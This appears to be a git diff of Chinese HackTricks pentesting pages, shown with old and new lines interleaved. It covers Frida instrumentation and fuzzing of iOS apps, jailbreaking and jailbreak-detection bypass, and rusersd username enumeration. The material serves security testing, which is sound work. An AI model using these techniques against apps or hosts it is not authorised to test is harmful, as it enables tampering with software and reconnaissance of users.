4. 转到新添加的Frida源。
5. 安装Frida软件包。
1. 打开 Cydia/Sileo 应用。
2. 导航到 管理 -> 源 -> 编辑 -> 添加。
3. 输入 "https://build.frida.re" 作为 URL。
4. 前往新添加的 Frida 源。
5. 安装 Frida 包。
如果您使用**Corellium**,您需要从[https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)下载Frida版本`frida-gadget-[yourversion]-ios-universal.dylib.gz`并解压缩并复制到Frida要求的dylib位置,例如:`/Users/[youruser]/.cache/frida/gadget-ios.dylib`
如果您使用 **Corellium**,您需要从 [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) 下载 Frida 版本 (`frida-gadget-[yourversion]-ios-universal.dylib.gz`),并解压并复制到 Frida 要求的 dylib 位置,例如:`/Users/[youruser]/.cache/frida/gadget-ios.dylib`
安装后,您可以在PC上使用命令**`frida-ls-devices`**并检查设备是否显示您的PC需要能够访问它)。\
要执行**`frida-ps -Uia`**来检查手机的运行进程。
安装后,您可以在您的 PC 上使用命令 **`frida-ls-devices`** 检查设备是否出现(您的 PC 需要能够访问它)。\
可以执行 **`frida-ps -Uia`** 检查手机的运行进程。
## 无需越狱设备和无需修补应用程序的Frida
## 在未越狱设备上使用 Frida & 无需修补应用
查看这篇关于如何在非越狱设备上使用Frida而无需修补应用程序的博文[https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
查看这篇博客文章,了解如何在未越狱设备上使用 Frida 而无需修补应用[https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
## 安装Frida客户端
## Frida 客户端安装
安装**Frida工具**
安装 **frida 工具**
```bash
pip install frida-tools
pip install frida
```
安装了Frida服务器并连接设备后**检查**客户端是否**正常工作**
安装了 Frida 服务器并且设备正在运行并连接,**检查**客户端是否**正常工作**
```bash
frida-ls-devices # List devices
frida-ps -Uia # Get running processes
```
## Frida跟踪
## Frida Trace
```bash
# Functions
## Trace all functions with the word "log" in their name
@ -83,7 +84,7 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
<figure><img src="../../.gitbook/assets/image (1159).png" alt=""><figcaption></figcaption></figure>
* 获取**所有**可用的**类**(按字符串过滤)
* 获取 **所有** 可用的 **类**(按字符串过滤)
{% code title="/tmp/script.js" %}
```javascript
@ -105,7 +106,9 @@ console.log("Objective-C runtime is not available.");
```
{% endcode %}
* 获取类的所有方法(按字符串过滤)
* 获取 **所有** **方法****类**(按字符串过滤)
{% code title="/tmp/script.js" %}
```javascript
// frida -U <program> -l /tmp/script.js
@ -129,7 +132,7 @@ console.log("Objective-C runtime is not available.");
```
{% endcode %}
* **调用函数**
* **调用一个函数**
```javascript
// Find the address of the function to call
const func_addr = Module.findExportByName("<Prog Name>", "<Func Name>");
@ -161,15 +164,15 @@ wg_log(arg0, arg1, txt);
console.log("loaded");
```
## Frida模糊测试
## Frida Fuzzing
### Frida Stalker
[官方文档](https://frida.re/docs/stalker/)Stalker是Frida的代码**追踪引擎**。它允许跟踪线程,**捕获**每个函数,**每个代码块**,甚至执行的每条指令。
[来自文档](https://frida.re/docs/stalker/): Stalker 是 Frida 的代码 **跟踪引擎**。它允许线程被 **跟踪****捕获** 每个函数、**每个块**,甚至每个被执行的指令。
你可以在[https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)找到一个实现Frida Stalker的示例。
您可以在 [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py) 找到一个实现 Frida Stalker 的示例。
这是另一个示例,每次调用函数时附加Frida Stalker
这是另一个示例,用于在每次调用函数时附加 Frida Stalker:
```javascript
console.log("loading");
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>");
@ -203,14 +206,14 @@ Stalker.flush(); // this is important to get all events
});
```
{% hint style="danger" %}
这对于调试目的很有趣,但对于模糊测试来说,不断使用 **`.follow()`** 和 **`.unfollow()`** 是非常低效的。
这对于调试目的很有趣,但对于模糊测试来说,不断 **`.follow()`** 和 **`.unfollow()`** 是非常低效的。
{% endhint %}
## [Fpicker](https://github.com/ttdennis/fpicker)
[**fpicker**](https://github.com/ttdennis/fpicker) 是一个基于 **Frida 的模糊测试套件**,提供各种模糊测试模式,如 AFL++ 模式或被动跟踪模式。它应该可以在 Frida 支持的所有平台上运行。
[**fpicker**](https://github.com/ttdennis/fpicker) 是一个 **基于Frida的模糊测试套件**提供多种进程内模糊测试模式如AFL++模式或被动跟踪模式。它应该可以在所有Frida支持的平台上运行。
* [**安装 fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
* [**安装fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
```bash
# Get fpicker
git clone https://github.com/ttdennis/fpicker
@ -239,7 +242,7 @@ mkdir -p examples/wg-log/in # For starting inputs
# Create at least 1 input for the fuzzer
echo Hello World > examples/wg-log/in/0
```
* **Fuzzer脚本** (`examples/wg-log/myfuzzer.js`):
* **模糊测试脚本** (`examples/wg-log/myfuzzer.js`):
{% code title="examples/wg-log/myfuzzer.js" %}
```javascript
@ -304,13 +307,13 @@ rpc.exports.fuzzer = f;
```
{% endcode %}
* **编译** fuzzer
* **编译**模糊测试器
```bash
# From inside fpicker clone
## Compile from "myfuzzer.js" to "harness.js"
frida-compile examples/wg-log/myfuzzer.js -o harness.js
```
* 使用 **`radamsa`** 调用模糊器 **`fpicker`**
* 使用 **`radamsa`** 调用模糊测试**`fpicker`**
{% code overflow="wrap" %}
```bash
@ -321,20 +324,20 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
{% endcode %}
{% hint style="danger" %}
在这种情况下,我们在每个 payload 之后**不重新启动应用程序或恢复状态**。因此,如果 Frida 发现一个**崩溃**,那个 payload 之后的**下一个输入**可能也会**导致应用程序崩溃**(因为应用程序处于不稳定状态),即使**输入本不应导致**应用程序崩溃
在这种情况下,我们**不会在每个有效负载后重启应用程序或恢复状态**。因此,如果 Frida 发现**崩溃**,那么在该有效负载之后的**下一个输入**也可能会**崩溃应用程序**(因为应用程序处于不稳定状态),即使该**输入不应该崩溃**应用程序
此外Frida 将钩入 iOS 的异常信号,因此当**Frida 发现崩溃**时,可能**不会生成 iOS 崩溃报告**。
此外Frida 将钩住 iOS 的异常信号,因此当**Frida 发现崩溃**时,可能不会生成**iOS 崩溃报告**。
为了防止这种情况,例如,我们可以在每次 Frida 崩溃后重应用程序。
为了防止这种情况,例如,我们可以在每次 Frida 崩溃后重启应用程序。
{% endhint %}
### 日志崩溃
### 日志崩溃
您可以检查**macOS 控制台**或**`log`** cli 来查看 macOS 日志。\
您还可以使用**`idevicesyslog`**检查 iOS 的日志。\
一些日志会省略添加**`<private>`**的信息。要显示所有信息,您需要从[https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)安装某些配置文件以启用私人信息。
您还可以使用**`idevicesyslog`**检查 iOS 的日志。\
一些日志会省略信息,添加**`<private>`**。要显示所有信息,您需要从 [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) 安装一些配置文件以启用该私密信息。
如果您不知道该怎么
如果您不知道该怎么
```sh
vim /Library/Preferences/Logging/com.apple.system.logging.plist
<?xml version="1.0" encoding="UTF-8"?>
@ -348,17 +351,17 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist
killall -9 logd
```
您可以在以下位置检查崩溃情况
您可以检查崩溃记录在
- **iOS**
- 设置 → 隐私 → 分析与改进 → 分析数据
- `/private/var/mobile/Library/Logs/CrashReporter/`
- **macOS**:
- `/Library/Logs/DiagnosticReports/`
- `~/Library/Logs/DiagnosticReports`
* **iOS**
* 设置 → 隐私 → 分析与改进 → 分析数据
* `/private/var/mobile/Library/Logs/CrashReporter/`
* **macOS**:
* `/Library/Logs/DiagnosticReports/`
* `~/Library/Logs/DiagnosticReports`
{% hint style="warning" %}
iOS仅存储同一应用的25个崩溃情况因此您需要清理否则iOS将停止创建崩溃报告
iOS 仅存储同一应用的 25 个崩溃记录,因此您需要清理这些记录,否则 iOS 将停止生成崩溃记录
{% endhint %}
## Frida Android 教程
@ -367,32 +370,33 @@ iOS仅存储同一应用的25个崩溃情况因此您需要清理否则iOS
[frida-tutorial](../android-app-pentesting/frida-tutorial/)
{% endcontent-ref %}
## 参考资料
## 参考文献
- [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**损害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

124
mobile-pentesting/ios-pentesting/ios-testing-environment.md
View file

@ -1,106 +1,112 @@
# iOS 测试环境
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
## Apple 开发者计划
**配置文件标识**是与 Apple 开发者帐户关联的一组公钥和私钥。为了**签署应用程序**,您需要支付**99美元/年**注册到**Apple 开发者计划**以获取您的配置文件标识。没有这个,您将无法在物理设备上从源代码运行应用程序。另一种选择是使用**越狱设备**。
**配置身份**是与 Apple 开发者账户关联的一组公钥和私钥。为了**签名应用程序**,您需要支付**99$/年**注册**Apple 开发者计划**以获取您的配置身份。没有这个,您将无法在物理设备上从源代码运行应用程序。另一种方法是使用**越狱设备**。
从 Xcode 7.2 开始Apple 提供了一个选项来创建一个**免费 iOS 开发配置文件**,允许在真实的 iPhone 上编写和测试您的应用程序。转到 _Xcode_ --> _首选项_ --> _帐户_ --> _+_(添加新的应用 ID 到您的凭据) --> _单击创建的 Apple ID_ --> _管理证书_ --> _+_Apple 开发) --> _完成_\
\_\_然后为了在您的 iPhone 上运行应用程序,您需要首先**指示 iPhone 信任计算机**。然后,您可以尝试从 Xcode 在手机上**运行应用程序**,但会出现错误。因此,转到 _设置_ --> _通用_ --> _配置文件与设备管理_ --> 选择未受信任的配置文件并点击“**信任**”。
从 Xcode 7.2 开始Apple 提供了创建**免费 iOS 开发配置文件**的选项,允许在真实的 iPhone 上编写和测试您的应用程序。前往 _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (添加新的应用 ID 和您的凭据) --> _点击创建的 Apple ID_ --> _管理证书_ --> _+_ (Apple Development) --> _完成_\
\_\_然后为了在您的 iPhone 上运行应用程序,您首先需要**指示 iPhone 信任计算机。** 然后,您可以尝试**从 Xcode 在移动设备上运行应用程序,**但会出现错误。因此,前往 _设置_ --> _通用_ --> _配置文件和设备管理_ --> 选择不受信任的配置文件并点击“**信任**”。
请注意,**由相同签名证书签名的应用程序可以以安全的方式共享资源,如钥匙串项**。
请注意,**由相同签名证书签名的应用程序可以以安全的方式共享资源,如钥匙串项**。
配置文件存储在手机内的**`/Library/MobileDevice/ProvisioningProfiles`**
配置文件存储在手机内的 **`/Library/MobileDevice/ProvisioningProfiles`**
## **模拟器**
{% hint style="info" %}
请注意,**模拟器与模拟器不同**。模拟器只是模拟设备和功能的行为,但实际上不使用它们。
请注意,**模拟器与仿真器并不相同**。模拟器只是模拟设备的行为和功能,但实际上并不使用它们。
{% endhint %}
### **模拟器**
首先需要知道的是,在模拟器中进行渗透测试将比在越狱设备中进行的测试受到更多限制
您需要知道的第一件事是,**在模拟器中进行渗透测试的限制远大于在越狱设备中进行的限制**
构建和支持 iOS 应用程序所需的所有工具**只有在 Mac OS 上得到官方支持**。\
苹果用于创建/调试/检测 iOS 应用程序的事实标准工具是**Xcode**。它可以用于下载其他组件,如**模拟器**和不同**SDK** **版本**,以构建和**测试**您的应用程序。\
构建和支持 iOS 应用程序所需的所有工具**仅在 Mac OS 上正式支持**。\
Apple 的事实工具用于创建/调试/插桩 iOS 应用程序是**Xcode**。它可以用于下载其他组件,如**模拟器**和构建和**测试**您的应用程序所需的不同**SDK** **版本**。\
强烈建议从**官方应用商店**下载 Xcode。其他版本可能携带恶意软件。
模拟器文件可以在`/Users/<username>/Library/Developer/CoreSimulator/Devices` 中找到
模拟器文件可以在 `/Users/<username>/Library/Developer/CoreSimulator/Devices` 中找到
要打开模拟器,请运行 Xcode然后_Xcode 选项卡_ --> _打开开发人员工具_ --> _模拟器_\
\_\_在下面的点击“iPod touch \[...]”可以选择其他设备进行测试:
要打开模拟器,请运行 Xcode然后_Xcode 标签_ 中按 --> _打开开发者工具_ --> _模拟器_\
\_\_在下图中点击“iPod touch \[...\]”可以选择其他设备进行测试:
![](<../../.gitbook/assets/image (270).png>)
![](<../../.gitbook/assets/image (520).png>)
### 模拟器中的应用程序
`/Users/<username>/Library/Developer/CoreSimulator/Devices` 中,您可能会找到所有**已安装的模拟器**。如果您想访问在其中一个模拟器中创建的应用程序的文件,可能很难知道**应用程序安装在哪个模拟器中**。找到**正确的 UID**的快速方法是先在模拟器中执行应用程序,然后执行:
```bash
xcrun simctl list | grep Booted
iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted)
```
一旦您知道了 UID安装在其中的应用程序可以在 `/Users/<username>/Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application` 中找到。
一旦你知道了 UID安装在其中的应用可以在 `/Users/<username>/Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application` 中找到。
然而,令人惊讶的是您在这里找不到应用程序。您需要访问 `/Users/<username>/Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/`
然而,令人惊讶的是,你在这里找不到应用。你需要访问 `/Users/<username>/Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/`
在这个文件夹中,您可以**找到应用程序的包。**
在这个文件夹中,你可以**找到应用的包**。
## 模拟器
Corellium 是唯一公开可用的 iOS 模拟器。它是一种企业 SaaS 解决方案,采用按用户许可模式,不提供任何试用许可
Corellium 是唯一公开可用的 iOS 模拟器。它是一个企业级 SaaS 解决方案,采用按用户许可模式,不提供任何试用许可。
## 越狱
苹果严格要求在 iPhone 上运行的代码必须**由苹果颁发的证书签名**。**越狱**是积极**规避这些限制**和操作系统实施的其他安全控制的过程。因此,一旦设备越狱,负责检查已安装应用的**完整性检查**将被打补丁,因此被**绕过**。
苹果严格要求在 iPhone 上运行的代码必须**由苹果签发的证书签名**。**越狱**是主动**规避此类限制**和操作系统施加的其他安全控制的过程。因此,一旦设备越狱,负责检查应用安装的**完整性检查**就会被修补,从而**绕过**。
{% hint style="info" %}
与 Android 不同,**您无法在 iOS 中切换到“开发者模式”**以在设备上运行未签名/不受信任的代码。
与 Android 不同,**你不能在 iOS 中切换到“开发者模式”**以在设备上运行未签名/不受信任的代码。
{% endhint %}
### Android Rooting vs. iOS 越狱
### Android Rooting 与 iOS Jailbreaking
尽管经常进行比较Android 上的 **rooting** 和 iOS 上的 **jailbreaking** 是根本不同的过程。在 Android 设备上进行 **rooting** 可能涉及**安装 `su` 二进制文件**或**用具有 root 权限的自定义 ROM 替换系统**,如果解锁了引导加载程序,则不一定需要利用漏洞。**刷写自定义 ROM** 会在解锁引导加载程序后替换设备的操作系统,有时需要利用漏洞。
虽然经常被比较Android 的**rooting**和 iOS 的**越狱**在本质上是不同的过程。对 Android 设备进行 root 可能涉及**安装 `su` 二进制文件**或**用已 root 的自定义 ROM 替换系统**,如果引导加载程序已解锁,则不一定需要利用漏洞。**闪存自定义 ROM**在解锁引导加载程序后替换设备的操作系统,有时需要利用漏洞。
相比之下,由于引导加载程序限制为仅引导 Apple 签名的映像iOS 设备无法刷写自定义 ROM。**越狱 iOS** 旨在绕过苹果的代码签名保护,以运行未签名代码,这一过程由于苹果持续加强安全性而变得复杂。
相比之下,由于引导加载程序限制只能启动苹果签名的镜像iOS 设备无法闪存自定义 ROM。**越狱 iOS**旨在绕过苹果的代码签名保护以运行未签名的代码,这一过程因苹果持续的安全增强而变得复杂。
### 越狱挑战
随着苹果迅速修补漏洞,越狱 iOS 变得越来越困难。**降级 iOS** 仅在发布后的有限时间内可能,这使得越狱成为一项时间敏感的问题。用于安全测试的设备不应更新,除非可以保证重新越狱
越狱 iOS 变得越来越困难,因为苹果迅速修补漏洞。**降级 iOS**仅在发布后有限时间内可能,越狱是一个时间敏感的问题。用于安全测试的设备在确保重新越狱的情况下不应更新
iOS 更新受到**挑战-响应机制**SHSH blobs的控制只允许安装苹果签名的响应。这种机制被称为“签名窗口”限制了存储和以后使用 OTA 固件包的能力。[IPSW Downloads 网站](https://ipsw.me) 是检查当前签名窗口的资源。
iOS 更新由**挑战-响应机制**SHSH blobs控制仅允许安装苹果签名的响应。这个机制被称为“签名窗口”限制了存储和后续使用 OTA 固件包的能力。[IPSW 下载网站](https://ipsw.me)是检查当前签名窗口的资源。
### 越狱类
### 越狱
* **有线越狱** 需要每次重新启动都连接到计算机。
* **半有线越狱** 允许在没有计算机的情况下启动到非越狱模式。
* **半无线越狱** 需要手动重新越狱,无需计算机。
* **无线越狱** 提供永久的越狱解决方案,无需重新应用。
* **有线越狱**需要每次重启时连接计算机。
* **半有线越狱**允许在不连接计算机的情况下启动到非越狱模式。
* **半无缝越狱**需要手动重新越狱而不需要计算机。
* **无缝越狱**提供永久越狱解决方案,无需重新应用。
### 越狱工具和资源
越狱工具根据 iOS 版本和设备而异。资源如 [Can I Jailbreak?](https://canijailbreak.com)、[The iPhone Wiki](https://www.theiphonewiki.com) 和 [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) 提供最新信息。例如
越狱工具 iOS 版本和设备而异。资源如 [Can I Jailbreak?](https://canijailbreak.com)、[The iPhone Wiki](https://www.theiphonewiki.com) 和 [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) 提供最新信息。示例包括
* [Checkra1n](https://checkra.in/) 适用于 A7-A11 芯片设备。
* [Palera1n](https://palera.in/) 适用于 Checkm8 设备A8-A11,支持 iOS 15.0-16.5
* [Palera1n](https://palera.in/) 适用于 iOS 15.0-16.5 上的 Checkm8 设备A8-A11
* [Unc0ver](https://unc0ver.dev/) 适用于 iOS 版本高达 14.8。
修改您的设备存在风险,越狱应谨慎对待
修改设备存在风险,越狱应谨慎进行
### 越狱的好处和风险
越狱**移除了操作系统强制的沙箱限制**,使应用程序可以访问整个文件系统。这种自由使得可以安装未经批准的应用程序并访问更多的 API。然而对于普通用户由于潜在的安全风险和设备不稳定性不建议越狱
越狱**移除操作系统施加的沙盒限制**,允许应用访问整个文件系统。这种自由使得安装未批准的应用和访问更多 API 成为可能。然而,对于普通用户来说,由于潜在的安全风险和设备不稳定,越狱**不推荐**
### **越狱后**
@ -110,23 +116,39 @@ iOS 更新受到**挑战-响应机制**SHSH blobs的控制只允许安
### **越狱检测**
**一些应用程序将尝试检测移动设备是否已越狱,如果是,则应用程序将无法运行**
**一些应用会尝试检测手机是否越狱,如果是,应用将无法运行**
* 在越狱后的 iOS 中通常会安装**文件和文件夹**,可以搜索这些内容以确定设备是否已越狱。
* 在越狱设备上,应用程序可以在沙箱之外获得**新文件的读/写访问权限**
* 一些**API 调用**会**表现不同**
* 存在 **OpenSSH** 服务的迹象
* 调用 `/bin/sh` 将返回 1 而不是 0。
* 在越狱后的 iOS 中**文件和文件夹通常会被安装**,可以搜索这些文件以确定设备是否越狱。
* 在越狱设备中,应用可以**读写新文件**,超出沙盒限制
* 一些**API** **调用**将**表现不同**
* **OpenSSH** 服务的存在
* 调用 `/bin/sh`**返回 1** 而不是 0。
**有关如何检测越狱的更多信息** [**在此处**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**。**
**有关如何检测越狱的更多信息** [**在这里**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**。**
您可以尝试使用 **objection** `ios jailbreak disable` 来避免这些检测。
你可以尝试使用 **objection 的** `ios jailbreak disable` 来避免这些检测。
## **越狱检测绕过**
* 您可以尝试使用 **objection** `ios jailbreak disable` 来避免这些检测。
* 您还可以安装工具 **Liberty Lite** (https://ryleyangus.com/repo/)。一旦添加了存储库,该应用程序应该出现在“搜索”选项卡中。
* 你可以尝试使用 **objection 的** `ios jailbreak disable` 来避免这些检测。
* 你还可以安装工具 **Liberty Lite** (https://ryleyangus.com/repo/)。一旦添加了 repo应用应该会出现在“搜索”标签中。
## 参考资料
## 参考
* [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

40
network-services-pentesting/1026-pentesting-rusersd.md
View file

@ -1,24 +1,27 @@
# 1026 - 渗透测试 Rusersd
# 1026 - Pentesting Rusersd
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## 基本信息
此协议将为您提供主机的用户名。您可以通过端口映射服务找到此类服务的列表,如下所示:
该协议将提供主机的用户名。您可能能够通过端口映射服务找到列出的服务,如下所示:
![](<../.gitbook/assets/image (1041).png>)
### 枚举
```
root@kali:~# apt-get install rusers
root@kali:~# rusers -l 192.168.10.1
@ -27,16 +30,17 @@ Sending broadcast for rusersd protocol version 2...
tiff potatohead:console Sep 2 13:03 22:03
katykat potatohead:ttyp5 Sep 1 09:35 14
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
